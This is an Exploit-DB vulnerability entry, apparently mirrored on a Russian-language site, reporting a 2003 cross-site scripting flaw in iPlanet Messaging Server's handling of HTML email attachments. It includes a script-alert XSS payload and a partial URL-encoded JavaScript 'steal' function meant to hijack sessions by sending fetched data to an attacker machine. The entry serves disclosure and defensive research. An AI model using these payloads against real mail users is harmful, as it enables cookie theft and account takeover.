- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 22662
- Проверка EDB
-
- Пройдено
- Автор
- KERNELPANIKLABS
- Тип уязвимости
- REMOTE
- Платформа
- MULTIPLE
- CVE
- null
- Дата публикации
- 2003-05-27
Код:
source: https://www.securityfocus.com/bid/7704/info
It has been reported that iPlanet Messaging Server may be prone to cross-site scripting attacks. The problem is said to occur while processing HTML attachments received via e-mail. If successfully exploited, a malicious HTML file may be used to steal an unsuspecting users iPlanet Messaging cookies. Other attacks may also be possible.
<html>
<script>alert(document.URL)</script>
</html>
The following script code has been provided to demonstrate indirect session hijacking using web redirection:
function%20steal(){var%20xmlHttp%20=%20new%20ActiveXObject("Microsoft.XMLHTTP");xmlHttp.open("GET","<URL_to_spoof>",false);xmlHttp.send();xmlDoc=xmlHttp.responseText;
"xmldoc" can be redirected with a "img src", "window.open", to the attacker machine.- Источник
- www.exploit-db.com
